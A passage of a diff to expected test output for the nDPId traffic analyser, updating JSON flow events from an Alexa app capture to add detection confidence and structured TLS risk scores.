 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1205,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976085978,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoqZ5AAEAGnWSsECrYNF7ohrKIAbvGQPZK40EdllAQAVdJCQAA"}
-00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1206,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085829,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976085978,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1206,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085829,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976085978,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1207,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1490976085978,"pkt":"ePiC0\/vCAMDKkVoBCABFEAAoAABAAD0Gmy7AqAsBrBAq2B+QliIAAAAAp\/J0hVAUAAA7FAAAAAAAAAAA"}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1208,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085644,"flow_last_seen":1490976086218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976086218,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1208,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085644,"flow_last_seen":1490976086218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976086218,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1490976086218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976086218,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwSbFAAOcGVkk0XuiGrBAq2AG7soktOgAj+XDMt3ASH\/7IcwAAAgQFtAEDAwY="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1490976086218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976086218,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwHTJAAOcGgsg0XuiGrBAq2AG7sosHecze3XmCE3ASH\/6IEgAAAgQFtAEDAwY="}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1212,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085829,"flow_last_seen":1490976086218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976086218,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1212,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085829,"flow_last_seen":1490976086218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976086218,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1216,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1490976086219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976086219,"pkt":"AMDKkaPvePiC0\/vCCABFAAAok2JAAEAGs6CsECrYNF7ohrKJAbv5cMy3LToAJFAQAVcS5QAA"}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1490976086220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976086220,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo3c9AAEAGaTOsECrYNF7ohrKLAbvdeYITB3nM31AQAVfSgwAA"}
-00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085832,"flow_last_seen":1490976086244,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976086244,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1230,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085832,"flow_last_seen":1490976086648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976086648,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085832,"flow_last_seen":1490976086244,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976086244,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1230,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085832,"flow_last_seen":1490976086648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976086648,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1490976086880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976086880,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8m\/ZAAEAGPiOsECrYCsl+8Z0yH5CNbMQpAAAAAKAC\/\/93zQAAAgQFtAQCCAoA9mBAAAAAAAEDAwg="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088605,"flow_last_seen":1490976088605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976088605,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1490976088605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976088605,"pkt":"AMDKkaPvePiC0\/vCCABFAAA81ixAAEAGcMKsECrYNF7ohrKNAbu9HLbAAAAAAKAC\/\/\/KKQAAAgQFtAQCCAoA9mDsAAAAAAEDAwg="}
@@ -479,9 +479,9 @@
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1268,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":2,"flow_last_seen":1490976088845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976088845,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwfFZAAOcGI6Q0XuiGrBAq2AG7so2w2ze+vRy2wXASH\/5ffQAAAgQFtAEDAwY="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1490976088845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976088845,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3pBAAOcGwWk0XuiGrBAq2AG7so5AYHD5hKZUtXASH\/4xPwAAAgQFtAEDAwY="}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":3,"flow_last_seen":1490976088847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976088847,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo1i1AAEAGcNWsECrYNF7ohrKNAbu9HLbBsNs3v1AQAVep7gAA"}
-00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1273,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976088605,"flow_last_seen":1490976088849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976088849,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1273,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976088605,"flow_last_seen":1490976088849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976088849,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1490976088850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976088850,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoNFxAAEAGEqesECrYNF7ohrKOAbuEplS1QGBw+lAQAVd7sAAA"}
-00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1276,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976088631,"flow_last_seen":1490976088854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976088854,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1276,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976088631,"flow_last_seen":1490976088854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976088854,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1490976088880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976088880,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8m\/dAAEAGPiKsECrYCsl+8Z0yH5CNbMQpAAAAAKAC\/\/93BQAAAgQFtAQCCAoA9mEIAAAAAAEDAwg="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088937,"flow_last_seen":1490976088937,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976088937,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1490976088937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976088937,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8PTlAAEAGCbasECrYNF7ohrKPAbuIDFw0AAAAAKAC\/\/9ZowAAAgQFtAQCCAoA9mENAAAAAAEDAwg="}
@@ -497,8 +497,8 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1285,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1490976089426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976089426,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZGdAAEAG4oesECrYNF7ohsHeAFAhsQVZAAAAAKAC\/\/8IxQAAAgQFtAQCCAoA9mE+AAAAAAEDAwg="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1289,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1490976089930,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976089930,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8PTpAAEAGCbWsECrYNF7ohrKPAbuIDFw0AAAAAKAC\/\/9ZPwAAAgQFtAQCCAoA9mFxAAAAAAEDAwg="}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1290,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1490976089963,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976089963,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8FFNAAEAGMpysECrYNF7ohrKQAbsDIHVdAAAAAKAC\/\/\/E\/wAAAgQFtAQCCAoA9mFzAAAAAAEDAwg="}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1294,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088631,"flow_last_seen":1490976090037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1490976090037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1297,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088605,"flow_last_seen":1490976090037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1490976090037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1294,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088631,"flow_last_seen":1490976090037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1490976090037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1297,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088605,"flow_last_seen":1490976090037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1490976090037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
